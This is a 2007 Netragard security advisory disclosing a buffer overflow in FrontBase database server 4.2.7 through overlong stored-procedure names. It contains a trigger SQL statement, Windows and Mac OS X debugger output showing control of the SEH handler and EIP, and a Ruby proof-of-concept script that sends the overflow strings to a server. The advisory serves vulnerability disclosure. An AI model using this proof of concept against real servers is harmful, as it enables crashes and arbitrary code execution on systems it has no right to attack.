<<< Date Index >>>     <<< Thread Index >>>

[NETRAGARD-20070316 SECURITY ADVISORY][FrontBase Database <= 4.2.7 ALL PLATFORMS][REMOTE BUFFER OVERFLOW CONDITION][LEVEL: EASY][RISK:MEDIUM]



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

******************** Netragard,  L.L.C  Advisory* *******************
                        
                     Strategic Reconnaissance Team


              ------------------------------------------------
              http://www.netragard.com -- "We make I.T. Safe."




[Advisory Information]
- -----------------------------------------------------------------------
Contact                         : Adriel T. Desautels
Researcher                      : Kevin Finisterre
Advisory ID                     : NETRAGARD-20070316
Product Name                    : FrontBase Relational Database Server
Product Version                 : <= FrontBase 4.2.7 (All Platforms)
Vendor Name                     : FrontBase, Inc.
Type of Vulnerability           : Remote Buffer Overflow
Effort                          : Easy





[POSTING NOTICE]
- -----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.

<a href=http://www.netragard.com/html/recent_research.html>
Netragard Research
</a>





[About Netragard]
- -----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products,
Security Appliances, Network Appliances, and Web Applications commonly
found in businesses internationally. We apply the knowledge gained by
performing this research to our professional security services. This
in turn enables us to produce high quality deliverables that are the
product of talented security professionals and not those of automated
scanners and tools.  This advisory is the product of research done by
the Strategic Reconnaissance Team.






[Product Description]
- -----------------------------------------------------------------------
"FrontBase is the only enterprise level relational database server that
was created in the Internet age, by Internet professionals specifically
to meet and exceed the demands of today's new economy."

- -- http://www.frontbase.com/  --





[Technical Summary]
- -----------------------------------------------------------------------

Any user with access to the FrontBase SQL command prompt and sufficient
privileges to create a stored procedure may be able to exploit a buffer
overflow condition in the parsing of 'CREATE PROCEDURE' SQL requests.
Successful exploitation may result in arbitrary code execution or a
denial of service condition.





[Technical Details]
- -----------------------------------------------------------------------
An exploitable vulnerability exists in FrontBase that can be used to
gain NT AUTHORITY\SYSTEM or root privileges on an affected system.  This
vulnerability exists within the creation Stored Procedures. If a user
creates a procedure with a very long name FrontBase will crash due to
memory
corruption. Memory can be corrupted in such a way that an attacker can
run arbitrary code.

The following example buffer can be used to trigger the vulnerability:

create procedure
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
....
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"()
begin
end;

Upon parsing the final ';' in the statement the database will trigger an
exception and crash.

Example:
FrontBase currently runs on the following variety of platforms:

Mac OS X Server 10.x
Mac OS X Server 1.2
RedHat
SuSE
YellowDog Linux
Debian Linux
Mandrake Linux
FreeBSD
Solaris
HP-UX
Windows  Windows NT
Windows 2000

Below are a few examples of debugger output which highlight the bug.

On the windows Platform one of two things are possible. First we can
overwrite the SEH Handler with an address of our choosing. Because we
also overwrite EDI when we smash the SEH we will trigger an exception.
This enables us to inject a malicious exception handler.

EAX 00000000

ECX FFFFFFFF

EDX 01863214

EBX 01863484

ESP 0196F344

EBP 018666D8

ESI 01863E0C

EDI 41414141

EIP 0043BE6D FrontBas.0043BE6D


SEH chain of thread 00000D3C

Address    SE handler

0196FFA4   04030201


The other option on windows is to simply overwrite the EIP address.
This method may not be as straight forward due to limited register
control. It may be possible to jump into ESP and make use of a small
7 byte buffer as leverage to reach the attackers shellcode of choice.

EAX 01863E0C
ECX 0099FD30
EDX 0099FD30
EBX 00000121
ESP 0196F480
EBP 00000000
ESI 01863484
EDI 018666A4
EIP 44434241

0196F478   41414141
0196F47C   44434241
0196F480   04030201  <---- Value at ESP  (4 bytes)
0196F484   5F070605  <---- Value at ESP  (3 bytes)


Under OSX we appear to smash the saved return address and its accompanying
frame. We also seem to have some control over the first frame as well.

k-s-computer-:/Users/kf root# gdb /Library/FrontBase/bin/FrontBase -q
Reading symbols for shared libraries .... done
(gdb) r newDB
Starting program: /Library/FrontBase/bin/FrontBase newDB
Reading symbols for shared libraries . done
2007-03-12 12:01:25 License problem detected:
Using the unlicensed FREE version options
2007-03-12 12:01:25 FrontBase Server - 4.2.7 on Mac OS X [Server]
2007-03-12 12:01:25 Transaction Log disabled

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x44434335
[Switching to process 2468 thread 0x2003]
0x000c6688 in ?? ()
(gdb) bt
#0  0x000c6688 in ?? ()
#1  0x41414141 in ?? ()
(gdb) x/i $eip
0xc6688:        mov    %edx,244(%eax)
(gdb) i r
eax            0x44434241       1145258561
ecx            0x0      0
edx            0x486690 4744848
ebx            0x4886d0 4753104
esp            0xb02f3290       0xb02f3290
ebp            0xb02f32d8       0xb02f32d8
esi            0x44434241       1145258561
edi            0xb02f3334       -1339083980
eip            0xc6688  0xc6688
eflags         0x10286  66182
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x37     55
(gdb) i f
Stack level 0, frame at 0xb02f3294:
 eip = 0xc6688; saved eip 0x41414141
 called by frame at 0x41414149
 Arglist at 0xb02f328c, args:
 Locals at 0xb02f328c, Previous frame's sp is 0xb02f3294
 Saved registers:
  ebp at 0xb02f328c, eip at 0xb02f3290
(gdb) frame 1
#1  0x41414141 in ?? ()
(gdb) i r
eax            0x44434241       1145258561
ecx            0x0      0
edx            0x486690 4744848
ebx            0x4886d0 4753104
esp            0xb02f3294       0xb02f3294
ebp            0x41414141       0x41414141
esi            0x44434241       1145258561
edi            0xb02f3334       -1339083980
eip            0x41414141       0x41414141
eflags         0x10286  66182
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x37     55





[Proof Of Concept]
- -----------------------------------------------------------------------

#!/usr/bin/ruby

require "frontbase"

connection = FBSQL_Connect.connect("192.168.0.6", -1, "newDB",
"_system", "", "", "")
# Windows XP Sp2 - SEH hit.
b00m = 'create procedure "' + 'A'*3115 + "\x01\x02\x03\x04" + '"() '  +
'begin ' + 'end;'

# Windows XP Sp2 - EIP hit and control of data at ESP.
# b00m = 'create procedure "' + 'A'*255 + "ABCD" +
"\x01\x02\x03\x04\x05\x06\x07" + '"() '  + 'begin ' + 'end;'

# OSX 10.4.8 control of EAX and ESI in frame 0, control of EAX EBP ESI
and EIP in frame 1
# b00m = 'create procedure "' + 'A'*291 + "0123" + "ABCD" + '"() '  +
'begin ' + 'end;'   # OSX  - x86

connection.exec(b00m)





[Vendor Status]
- -----------------------------------------------------------------------
Vendor Notified on 03/08/07
Vendor Patched on 03/09/07
Vendor has stated the following:

Thx. for the report, the bug has been fixed and the fix will be in the
next general release. An error like this will be generated: Syntax error
005. The length of a regular identifier is not to exceed 128 characters.
Exception 363 (40:000). Transaction rollback.





[Disclaimer]
- ----------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com>
http://www.netragard.com
</a>




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFF+wHiQwbn1P9Iaa0RAiJ3AJ4jAGglza+4PuH5P1PF3z2ebpZ/GgCbBxSs
2gpgltsr3ugv8xi52xj7cx4=
=c9QZ
-----END PGP SIGNATURE-----